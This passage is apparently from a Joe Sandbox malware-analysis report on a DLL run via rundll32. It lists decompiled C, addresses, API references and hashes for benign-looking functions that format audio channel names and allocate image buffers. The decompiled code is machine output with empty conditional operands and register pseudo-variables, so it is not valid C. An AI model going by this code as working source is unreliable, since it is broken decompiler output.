				if(_t88 <= 0x3ff) {
					 *((intOrPtr*)(_t123 + 8)) = _t88;
					_t55 = "AMBI%d";
					 *(_t123 + 4) = _t55;
					 *_t123 = _t77;
					L1();
					return _t55;
				} else {
					if(__eax <= 0x28) {
						__edx =  *(0x100af280 + __eax * 8);
						if(__edx == 0) {
							goto L34;
						} else {
							 *(__esp + 8) = __edx;
							__eax = "%s";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						}
					} else {
						if(__eax != 0xffffffff) {
							L34:
							 *(__esp + 8) = __eax;
							__eax = "USR%d";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						} else {
							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
							__edx = "NONE";
							 *(__esp + 0x24) = "NONE";
							__esp = __esp + 0x1c;
							_t125 = _t123 - 0x2c;
							_t119 = _t125[0x10];
							_t72 = _t119[2];
							_t125[6] =  &(_t119[4]);
							while(1) {
								_t57 = _t119[1];
								_t90 =  <=  ? _t57 : _t72;
								_t73 = _t72 - ( <=  ? _t57 : _t72);
								if(_t73 != 0) {
									goto L2;
								}
								 *_t125 = 0;
								_t125[3] =  &(_t125[0x12]);
								_t125[2] = _t125[0x11];
								_t125[1] = 0;
								_t59 = L10093500();
								_t113 = _t59;
								if(_t59 > 0) {
									L4:
									_t92 = _t119[2];
									_t64 = _t119[3];
									_t75 = _t119[1];
									if(_t92 == _t64 || _t75 >= _t92) {
										L25:
										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
										_t119[1] = 0xfffffffa;
										if(_t92 == 0) {
											goto L16;
										} else {
											_t94 =  >  ? _t59 : _t92 - 1;
											_t63 =  *_t119;
											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
											return _t63;
										}
									} else {
										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
										_t72 = _t64;
										if(_t64 >> 1 >= _t92) {
											_t72 = _t92 + _t92;
										}
										if(_t72 < _t81) {
											_t87 =  <=  ? _t64 : _t81;
											_t72 =  <=  ? _t64 : _t81;
										}
										_t103 =  *_t119;
										_t125[1] = _t72;
										if(_t103 == _t125[6]) {
											 *_t125 = 0;
											_t66 = E10026280();
											if(_t66 == 0) {
												goto L24;
											} else {
												goto L18;
											}
										} else {
											 *_t125 = _t103;
											_t66 = E10026280();
											if(_t66 == 0) {
												L24:
												_t75 = _t119[1];
												_t92 = _t119[2];
												goto L25;
											} else {
												if(_t103 == 0) {
													L18:
													_t95 = _t119[1];
													_t104 = _t66;
													_t116 =  *_t119;
													_t82 = _t95 + 1;
													_t125[7] = _t116;
													if(_t82 >= 8) {
														if((_t66 & 0x00000001) != 0) {
															_t83 =  *_t116 & 0x000000ff;
															_t104 = _t66 + 1;
															_t116 = _t116 + 1;
															 *_t66 = _t83;
															_t82 = _t95;
														}
														if((_t104 & 0x00000002) != 0) {
															_t96 =  *_t116 & 0x0000ffff;
															_t104 = _t104 + 2;
															_t116 = _t116 + 2;
															_t82 = _t82 - 2;
															 *(_t104 - 2) = _t96;
														}
														if((_t104 & 0x00000004) == 0) {
															goto L19;
														} else {
															_t107 = _t104 + 4;
															 *(_t107 - 4) =  *_t116;
															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
															_t125 =  &(_t125[3]);
															goto L13;
														}
													} else {
														L19:
														_t67 = memcpy(_t104, _t116, _t82);
														_t125 =  &(_t125[3]);
														goto L13;
													}
													goto L36;
												}
												L13:
												 *_t119 = _t67;
												_t119[2] = _t72;
												continue;
											}
										}
									}
								} else {
									L16:
									return _t59;
								}
								goto L36;
								L2:
								_t125[3] =  &(_t125[0x12]);
								_t125[1] = _t73;
								_t125[2] = _t125[0x11];
								 *_t125 = _t57 +  *_t119;
								_t59 = L10093500();
								_t113 = _t59;
								if(_t59 <= 0) {
									goto L16;
								} else {
									if(_t59 < _t73) {
										goto L24;
									} else {
										goto L4;
									}
								}
								goto L36;
							}
						}
					}
				}
				L36:
			}

0x1000c220
0x1000c227
0x1000c22b
0x1000c237
0x1000c2a8
0x1000c2ac
0x1000c2b1
0x1000c2b5
0x1000c2b8
0x1000c2c0
0x1000c239
0x1000c23c
0x1000c260
0x1000c269
0x00000000
0x1000c26b
0x1000c26b
0x1000c26f
0x1000c274
0x1000c278
0x1000c27b
0x1000c280
0x1000c283
0x1000c283
0x1000c23e
0x1000c241
0x1000c288
0x1000c288
0x1000c28c
0x1000c291
0x1000c295
0x1000c298
0x1000c29d
0x1000c2a0
0x1000c243
0x1000c243
0x1000c247
0x1000c24c
0x1000c250
0x100089c4
0x100089c7
0x100089ce
0x100089d1
0x10008a7d
0x10008a7d
0x10008a84
0x10008a87
0x10008a89
0x00000000
0x00000000
0x10008a8f
0x10008a9a
0x10008aa2
0x10008aa8
0x10008aac
0x10008ab3
0x10008ab5
0x10008a13
0x10008a13
0x10008a16
0x10008a19
0x10008a1e
0x10008b26
0x10008b2f
0x10008b32
0x10008b36
0x10008b39
0x00000000
0x10008b3b
0x10008b3e
0x10008b41
0x10008b44
0x10008b4f
0x10008b4f
0x10008a2c
0x10008a37
0x10008a3c
0x10008a42
0x10008a44
0x10008a46
0x10008a46
0x10008a4b
0x10008a4f
0x10008a52
0x10008a52
0x10008a54
0x10008a57
0x10008a61
0x10008ac8
0x10008acf
0x10008ad6
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a63
0x10008a63
0x10008a66
0x10008a6d
0x10008b20
0x10008b20
0x10008b23
0x00000000
0x10008a73
0x10008a75
0x10008ad8
0x10008ad8
0x10008adb
0x10008add
0x10008ae0
0x10008ae3
0x10008aea
0x10008af2
0x10008b50
0x10008b53
0x10008b56
0x10008b57
0x10008b59
0x10008b59
0x10008afa
0x10008b5d
0x10008b60
0x10008b63
0x10008b66
0x10008b69
0x10008b69
0x10008b02
0x00000000
0x10008b04
0x10008b06
0x10008b0f
0x10008b12
0x10008b12
0x00000000
0x10008b12
0x10008aec
0x10008aec
0x10008aec
0x10008aec
0x00000000
0x10008aec
0x00000000
0x10008aea
0x10008a77
0x10008a77
0x10008a7a
0x00000000
0x10008a7a
0x10008a6d
0x10008a61
0x10008abb
0x10008abb
0x10008ac2
0x10008ac2
0x00000000
0x100089e0
0x100089e7
0x100089ef
0x100089f5
0x100089f9
0x100089fc
0x10008a03
0x10008a05
0x00000000
0x10008a0b
0x10008a0d
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a0d
0x00000000
0x10008a05
0x10008a7d
0x1000c241
0x1000c23c
0x00000000

APIs

mv_bprintf.MAIN ref: 1000C27B
mv_bprintf.MAIN ref: 1000C298
mv_bprintf.MAIN ref: 1000C2B8

Strings

NONE, xrefs: 1000C247
USR%d, xrefs: 1000C28C
AMBI%d, xrefs: 1000C2AC

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: AMBI%d$NONE$USR%d
API String ID: 3083893021-3656852315
Opcode ID: 6cd4f19d3d74ee3d12c501f26348e63cdefaf32e071506f7e6661ce223037e5e
Instruction ID: 7fcf34f7b534e12bd35e409064aa58f3f25e521088902b3bc772a385e2e8df73
Opcode Fuzzy Hash: 6cd4f19d3d74ee3d12c501f26348e63cdefaf32e071506f7e6661ce223037e5e
Instruction Fuzzy Hash: FA0121B4909B85CBD344EF68848052DB6E1FB94384F948A6DE4CC87755E639DE409B83

Uniqueness

Uniqueness Score: -1.00%

Function 1000C3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1000C3C0() {
				char* _t55;
				void* _t57;
				void* _t59;
				void* _t63;
				unsigned int _t64;
				signed char _t66;
				void* _t67;
				unsigned int _t72;
				unsigned int _t73;
				void* _t75;
				intOrPtr _t77;
				void* _t81;
				int _t82;
				signed int _t83;
				intOrPtr _t88;
				void* _t92;
				int _t95;
				signed int _t96;
				void* _t103;
				void* _t104;
				void* _t107;
				void* _t113;
				void* _t116;
				void** _t119;
				void* _t122;
				intOrPtr* _t123;
				void** _t125;

				_t123 = _t122 - 0x1c;
				_t77 =  *((intOrPtr*)(_t123 + 0x20));
				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
				if(_t88 <= 0x3ff) {
					 *((intOrPtr*)(_t123 + 8)) = _t88;
					_t55 = "ambisonic ACN %d";
					 *(_t123 + 4) = _t55;
					 *_t123 = _t77;
					L1();
					return _t55;
				} else {
					if(__eax <= 0x28) {
						__edx =  *(0x100af284 + __eax * 8);
						if(__edx == 0) {
							goto L34;
						} else {
							 *(__esp + 8) = __edx;
							__eax = "%s";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						}
					} else {
						if(__eax != 0xffffffff) {
							L34:
							 *(__esp + 8) = __eax;
							__eax = "user %d";
							 *(__esp + 4) = __eax;
							 *__esp = __ecx;
							L1();
							__esp = __esp + 0x1c;
							return __eax;
						} else {
							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
							__edx = "none";
							 *(__esp + 0x24) = "none";
							__esp = __esp + 0x1c;
							_t125 = _t123 - 0x2c;
							_t119 = _t125[0x10];
							_t72 = _t119[2];
							_t125[6] =  &(_t119[4]);
							while(1) {
								_t57 = _t119[1];
								_t90 =  <=  ? _t57 : _t72;
								_t73 = _t72 - ( <=  ? _t57 : _t72);
								if(_t73 != 0) {
									goto L2;
								}
								 *_t125 = 0;
								_t125[3] =  &(_t125[0x12]);
								_t125[2] = _t125[0x11];
								_t125[1] = 0;
								_t59 = L10093500();
								_t113 = _t59;
								if(_t59 > 0) {
									L4:
									_t92 = _t119[2];
									_t64 = _t119[3];
									_t75 = _t119[1];
									if(_t92 == _t64 || _t75 >= _t92) {
										L25:
										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
										_t119[1] = 0xfffffffa;
										if(_t92 == 0) {
											goto L16;
										} else {
											_t94 =  >  ? _t59 : _t92 - 1;
											_t63 =  *_t119;
											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
											return _t63;
										}
									} else {
										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
										_t72 = _t64;
										if(_t64 >> 1 >= _t92) {
											_t72 = _t92 + _t92;
										}
										if(_t72 < _t81) {
											_t87 =  <=  ? _t64 : _t81;
											_t72 =  <=  ? _t64 : _t81;
										}
										_t103 =  *_t119;
										_t125[1] = _t72;
										if(_t103 == _t125[6]) {
											 *_t125 = 0;
											_t66 = E10026280();
											if(_t66 == 0) {
												goto L24;
											} else {
												goto L18;
											}
										} else {
											 *_t125 = _t103;
											_t66 = E10026280();
											if(_t66 == 0) {
												L24:
												_t75 = _t119[1];
												_t92 = _t119[2];
												goto L25;
											} else {
												if(_t103 == 0) {
													L18:
													_t95 = _t119[1];
													_t104 = _t66;
													_t116 =  *_t119;
													_t82 = _t95 + 1;
													_t125[7] = _t116;
													if(_t82 >= 8) {
														if((_t66 & 0x00000001) != 0) {
															_t83 =  *_t116 & 0x000000ff;
															_t104 = _t66 + 1;
															_t116 = _t116 + 1;
															 *_t66 = _t83;
															_t82 = _t95;
														}
														if((_t104 & 0x00000002) != 0) {
															_t96 =  *_t116 & 0x0000ffff;
															_t104 = _t104 + 2;
															_t116 = _t116 + 2;
															_t82 = _t82 - 2;
															 *(_t104 - 2) = _t96;
														}
														if((_t104 & 0x00000004) == 0) {
															goto L19;
														} else {
															_t107 = _t104 + 4;
															 *(_t107 - 4) =  *_t116;
															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
															_t125 =  &(_t125[3]);
															goto L13;
														}
													} else {
														L19:
														_t67 = memcpy(_t104, _t116, _t82);
														_t125 =  &(_t125[3]);
														goto L13;
													}
													goto L36;
												}
												L13:
												 *_t119 = _t67;
												_t119[2] = _t72;
												continue;
											}
										}
									}
								} else {
									L16:
									return _t59;
								}
								goto L36;
								L2:
								_t125[3] =  &(_t125[0x12]);
								_t125[1] = _t73;
								_t125[2] = _t125[0x11];
								 *_t125 = _t57 +  *_t119;
								_t59 = L10093500();
								_t113 = _t59;
								if(_t59 <= 0) {
									goto L16;
								} else {
									if(_t59 < _t73) {
										goto L24;
									} else {
										goto L4;
									}
								}
								goto L36;
							}
						}
					}
				}
				L36:
			}

0x1000c3c0
0x1000c3c7
0x1000c3cb
0x1000c3d7
0x1000c448
0x1000c44c
0x1000c451
0x1000c455
0x1000c458
0x1000c460
0x1000c3d9
0x1000c3dc
0x1000c400
0x1000c409
0x00000000
0x1000c40b
0x1000c40b
0x1000c40f
0x1000c414
0x1000c418
0x1000c41b
0x1000c420
0x1000c423
0x1000c423
0x1000c3de
0x1000c3e1
0x1000c428
0x1000c428
0x1000c42c
0x1000c431
0x1000c435
0x1000c438
0x1000c43d
0x1000c440
0x1000c3e3
0x1000c3e3
0x1000c3e7
0x1000c3ec
0x1000c3f0
0x100089c4
0x100089c7
0x100089ce
0x100089d1
0x10008a7d
0x10008a7d
0x10008a84
0x10008a87
0x10008a89
0x00000000
0x00000000
0x10008a8f
0x10008a9a
0x10008aa2
0x10008aa8
0x10008aac
0x10008ab3
0x10008ab5
0x10008a13
0x10008a13
0x10008a16
0x10008a19
0x10008a1e
0x10008b26
0x10008b2f
0x10008b32
0x10008b36
0x10008b39
0x00000000
0x10008b3b
0x10008b3e
0x10008b41
0x10008b44
0x10008b4f
0x10008b4f
0x10008a2c
0x10008a37
0x10008a3c
0x10008a42
0x10008a44
0x10008a46
0x10008a46
0x10008a4b
0x10008a4f
0x10008a52
0x10008a52
0x10008a54
0x10008a57
0x10008a61
0x10008ac8
0x10008acf
0x10008ad6
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a63
0x10008a63
0x10008a66
0x10008a6d
0x10008b20
0x10008b20
0x10008b23
0x00000000
0x10008a73
0x10008a75
0x10008ad8
0x10008ad8
0x10008adb
0x10008add
0x10008ae0
0x10008ae3
0x10008aea
0x10008af2
0x10008b50
0x10008b53
0x10008b56
0x10008b57
0x10008b59
0x10008b59
0x10008afa
0x10008b5d
0x10008b60
0x10008b63
0x10008b66
0x10008b69
0x10008b69
0x10008b02
0x00000000
0x10008b04
0x10008b06
0x10008b0f
0x10008b12
0x10008b12
0x00000000
0x10008b12
0x10008aec
0x10008aec
0x10008aec
0x10008aec
0x00000000
0x10008aec
0x00000000
0x10008aea
0x10008a77
0x10008a77
0x10008a7a
0x00000000
0x10008a7a
0x10008a6d
0x10008a61
0x10008abb
0x10008abb
0x10008ac2
0x10008ac2
0x00000000
0x100089e0
0x100089e7
0x100089ef
0x100089f5
0x100089f9
0x100089fc
0x10008a03
0x10008a05
0x00000000
0x10008a0b
0x10008a0d
0x00000000
0x00000000
0x00000000
0x00000000
0x10008a0d
0x00000000
0x10008a05
0x10008a7d
0x1000c3e1
0x1000c3dc
0x00000000

APIs

mv_bprintf.MAIN ref: 1000C41B
mv_bprintf.MAIN ref: 1000C438
mv_bprintf.MAIN ref: 1000C458

Strings

ambisonic ACN %d, xrefs: 1000C44C
none, xrefs: 1000C3E7
user %d, xrefs: 1000C42C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: ambisonic ACN %d$none$user %d
API String ID: 3083893021-4180635230
Opcode ID: 223aa0a192477accd332f19378ca7d36c64ee90d24a02cbd76f3be9b95891286
Instruction ID: dcc63c4345791cf420d4df1e5b10cc0e469fa513568dbd2a0042959f5c7c7fdf
Opcode Fuzzy Hash: 223aa0a192477accd332f19378ca7d36c64ee90d24a02cbd76f3be9b95891286
Instruction Fuzzy Hash: D7011EB4908B81CBD314EF28908152DBAE1FBD4284F94896DE4CC87355E639DA408B53

Uniqueness

Uniqueness Score: -1.00%

Function 1001B039 Relevance: 9.2, APIs: 6, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1001B039(void* __eax, void* __ebx) {
				void* _t82;

				__eflags = __eax;
				if(__eflags == 0) {
					L28:
					__edx = 0xffffffea;
				} else {
					__eax = 0;
					__esp[3] = 0;
					__eax = 0;
					__esp[2] = 0;
					__eax =  *(__ebx + 0x48);
					__esp[1] =  *(__ebx + 0x48);
					__eax =  *(__ebx + 0x44);
					 *__esp =  *(__ebx + 0x44);
					__eax = E1001F6A0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
					__eflags = __eax;
					__edx = __eax;
					if(__eax < 0) {
						goto L1;
					}
					__eax =  *(__ebx + 0x20);
					__eflags = __eax;
					if(__eflags != 0) {
						L14:
						__esp[0xc] = __eax;
						__eax =  *(__ebx + 0x24);
						__esp[0xd] =  *(__ebx + 0x24);
						__eax =  *(__ebx + 0x28);
						__esp[0xe] =  *(__ebx + 0x28);
						__eax =  *(__ebx + 0x2c);
						__esp[0xf] =  *(__ebx + 0x2c);
						__eax =  *(__ebx + 0x48);
						__edi =  *(__ebx + 0x48) + 0x1f;
						__eax =  &(__esp[0xc]);
						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
						__esp[3] =  &(__esp[0xc]);
						__esp[2] = __edi;
						__eax =  *(__ebx + 0x50);
						__esp[1] =  *(__ebx + 0x50);
						__eax =  &(__esp[0x10]);
						 *__esp =  &(__esp[0x10]);
						__eax = L1001EE90(__ebx, __edi, __esi, __ebp, __eflags);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L1;
						}
						__eax = 0x20;
						__ecx = __esp[0x10];
						__edx = 0x7fffffff;
						__eflags = __esp[0x1d] - 0x20;
						__ebp = 0x7fffffff;
						__eax =  >=  ? __esp[0x1d] : 0x20;
						__esi = 0x20;
						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
						__ebp = 0x7fffffdf;
						__eflags = 0x7fffffdf - __ecx;
						if(0x7fffffdf < __ecx) {
							goto L28;
						}
						__ecx = __ecx + __eax;
						__eax = __esp[0x11];
						0x7fffffff = 0x7fffffff - __ecx;
						__eflags = 0x7fffffff - __ecx - __eax;
						if(0x7fffffff - __ecx < __eax) {
							goto L28;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x12];
						__ebp = 0x7fffffff;
						__ebp = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __ecx;
						if(0x7fffffff < __ecx) {
							goto L28;
						}
						__eax = __eax + __ecx;
						__ecx = __esp[0x13];
						__edx = 0x7fffffff - __eax;
						__eflags = 0x7fffffff - __eax - __ecx;
						if(0x7fffffff - __eax < __ecx) {
							goto L28;
						}
						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
						 *(__ebx + 0xb8) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							__edx = 0xfffffff4;
							L30:
							__esp[0xb] = __edx;
							__ebx = E1001A460(__ebx);
							__edx = __esp[0xb];
							goto L1;
						}
						__edx = __ebx + 0x20;
						__esp[4] = __ebx + 0x20;
						__eax =  *(__eax + 4);
						__esp[2] = __edi;
						__esp[3] = __eax;
						__eax =  *(__ebx + 0x50);
						 *__esp = __ebx;
						__esp[1] =  *(__ebx + 0x50);
						__eax = L1001EFD0(__ebx, __edi, __esi, __ebp);
						__eflags = __eax;
						__edx = __eax;
						if(__eax < 0) {
							goto L30;
						}
						__eax =  *(__ebx + 4);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = __eax + __esi;
							__eflags = __eax;
							 *(__ebx + 4) = __eax;
						}
						__eax =  *(__ebx + 8);
						__eflags = __eax;
						if(__eax != 0) {
							 *(__ebx + 8) = __eax;
						}
						__eax =  *(__ebx + 0xc);
						__eflags = __eax;
						if(__eax != 0) {
							__edx = __esi + __esi * 2;
							__eax = __eax + __esi + __esi * 2;
							__eflags = __eax;
							 *(__ebx + 0xc) = __eax;
						}
						 *(__ebx + 0x40) = __ebx;
						__edx = 0;
					} else {
						__eax = __esp[0x1d];
						__esi = 0x20;
						__ebp = 1;
						__edi = __ebx + 0x20;
						__eflags = __esp[0x1d];
						__esi =  >  ? __esp[0x1d] : 0x20;
						__eax = 0x1f;
						__esp[0xb] = 0x1f;
						while(1) {
							__eax =  *(__ebx + 0x44);
							__ebp =  ~__ebp;
							 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
							__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
							__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
							__eax =  *(__ebx + 0x50);
							 *__esp = __edi;
							__esp[1] =  *(__ebx + 0x50);
							__eax = L1001EAB0(__eflags);
							__eflags = __eax;
							__edx = __eax;
							if(__eax < 0) {
								goto L1;
							}
							__eax =  *(__ebx + 0x20);
							__eflags = __esp[0xb] & __eax;
							if((__esp[0xb] & __eax) != 0) {
								__ebp = __ebp + __ebp;
								__eflags = __ebp - __esi;
								if(__eflags > 0) {
									L10:
									__ecx =  *(__ebx + 0x24);
									__eax = __esi + __eax - 1;
									__edx = __esi;
									__edx =  ~__esi;
									__eax = __eax & __edx;
									 *(__ebx + 0x20) = __eax;
									__eflags = __ecx;
									if(__eflags != 0) {
										__ecx = __esi + __ecx - 1;
										 *(__ebx + 0x24) = __ecx;
										__ecx =  *(__ebx + 0x28);
										__eflags = __ecx;
										if(__eflags != 0) {
											__ecx = __esi + __ecx - 1;
											 *(__ebx + 0x28) = __ecx;
											__ecx =  *(__ebx + 0x2c);
											__eflags = __ecx;
											if(__eflags != 0) {
												__edx = __edx & __ecx;
												__eflags = __edx;
												 *(__ebx + 0x2c) = __edx;
											}
										}
									}
									goto L14;
								}
								continue;
							}
							__eflags = __eax;
							if(__eflags == 0) {
								goto L14;
							}
							goto L10;
						}
					}
				}
				L1:
				return _t82;
			}

0x1001b048
0x1001b04a
0x1001b23d
0x1001b23d
0x1001b050
0x1001b050
0x1001b052
0x1001b056
0x1001b058
0x1001b05c
0x1001b05f
0x1001b063
0x1001b066
0x1001b069
0x1001b06e
0x1001b070
0x1001b072
0x00000000
0x00000000
0x1001b078
0x1001b07b
0x1001b07d
0x1001b121
0x1001b121
0x1001b125
0x1001b128
0x1001b12c
0x1001b12f
0x1001b133
0x1001b136
0x1001b13a
0x1001b13d
0x1001b140
0x1001b144
0x1001b147
0x1001b14b
0x1001b14f
0x1001b152
0x1001b156
0x1001b15a
0x1001b15d
0x1001b162
0x1001b164
0x1001b166
0x00000000
0x00000000
0x1001b16c
0x1001b171
0x1001b175
0x1001b17a
0x1001b17e
0x1001b180
0x1001b185
0x1001b187
0x1001b18e
0x1001b190
0x1001b192
0x00000000
0x00000000
0x1001b198
0x1001b19a
0x1001b1a0
0x1001b1a2
0x1001b1a4
0x00000000
0x00000000
0x1001b1aa
0x1001b1ac
0x1001b1b0
0x1001b1b2
0x1001b1b4
0x1001b1b6
0x00000000
0x00000000
0x1001b1bc
0x1001b1be
0x1001b1c2
0x1001b1c4
0x1001b1c6
0x00000000
0x00000000
0x1001b1cd
0x1001b1d2
0x1001b1d8
0x1001b1da
0x1001b2c7
0x1001b2cc
0x1001b2cc
0x1001b2d2
0x1001b2d7
0x00000000
0x1001b2d7
0x1001b1e0
0x1001b1e3
0x1001b1e7
0x1001b1ea
0x1001b1ee
0x1001b1f2
0x1001b1f5
0x1001b1f8
0x1001b1fc
0x1001b201
0x1001b203
0x1001b205
0x00000000
0x00000000
0x1001b20b
0x1001b20e
0x1001b210
0x1001b212
0x1001b212
0x1001b214
0x1001b214
0x1001b217
0x1001b21a
0x1001b21c
0x1001b221
0x1001b221
0x1001b224
0x1001b227
0x1001b229
0x1001b22b
0x1001b22e
0x1001b22e
0x1001b230
0x1001b230
0x1001b233
0x1001b236
0x1001b083
0x1001b083
0x1001b087
0x1001b08c
0x1001b091
0x1001b094
0x1001b096
0x1001b09b
0x1001b09e
0x1001b0ae
0x1001b0ae
0x1001b0b3
0x1001b0b7
0x1001b0b8
0x1001b0ba
0x1001b0be
0x1001b0c1
0x1001b0c4
0x1001b0c8
0x1001b0cd
0x1001b0cf
0x1001b0d1
0x00000000
0x00000000
0x1001b0d7
0x1001b0da
0x1001b0de
0x1001b0a8
0x1001b0aa
0x1001b0ac
0x1001b0e4
0x1001b0e4
0x1001b0e7
0x1001b0eb
0x1001b0ed
0x1001b0ef
0x1001b0f1
0x1001b0f4
0x1001b0f6
0x1001b0f8
0x1001b0fe
0x1001b101
0x1001b104
0x1001b106
0x1001b108
0x1001b10e
0x1001b111
0x1001b114
0x1001b116
0x1001b11c
0x1001b11c
0x1001b11e
0x1001b11e
0x1001b116
0x1001b106
0x00000000
0x1001b0f6
0x00000000
0x1001b0ac
0x1001b0e0
0x1001b0e2
0x00000000
0x00000000
0x00000000
0x1001b0e2
0x1001b0ae
0x1001b07d
0x1001af07
0x1001af10

APIs

mv_pix_fmt_desc_get.MAIN ref: 1001B043
mv_image_check_size.MAIN ref: 1001B069

Part of subcall function 1001F6A0: mv_image_get_linesize.MAIN ref: 1001F6E3

mv_image_fill_linesizes.MAIN ref: 1001B0C8

Part of subcall function 1001EAB0: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 1001EAC6

mv_image_fill_plane_sizes.MAIN ref: 1001B15D
mv_buffer_alloc.MAIN ref: 1001B1CD
mv_image_fill_pointers.MAIN ref: 1001B1FC

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_buffer_allocmv_image_check_sizemv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_image_get_linesize
String ID:
API String ID: 566543421-0
Opcode ID: f91591d019d291e180dcf44e96ce89918f7d927db6cfc3ba89d5ff0d6a58ef0d
Instruction ID: a5d1a7900a1a2f35fa09734171263621add282bd6d5ab2c0dd3880a3946380f0
Opcode Fuzzy Hash: f91591d019d291e180dcf44e96ce89918f7d927db6cfc3ba89d5ff0d6a58ef0d
Instruction Fuzzy Hash: 8A61F7B5A08B018FCB44DF69C59065ABBE1FF88240F16897DE949CB319E735E884CF41

Uniqueness

Uniqueness Score: -1.00%

Function 1003A4F0 Relevance: 9.2, APIs: 6, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1003A4F0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t66;
				signed char* _t72;
				signed char* _t75;
				signed char* _t79;
				int _t83;
				void* _t85;
				signed int _t86;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed char _t101;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
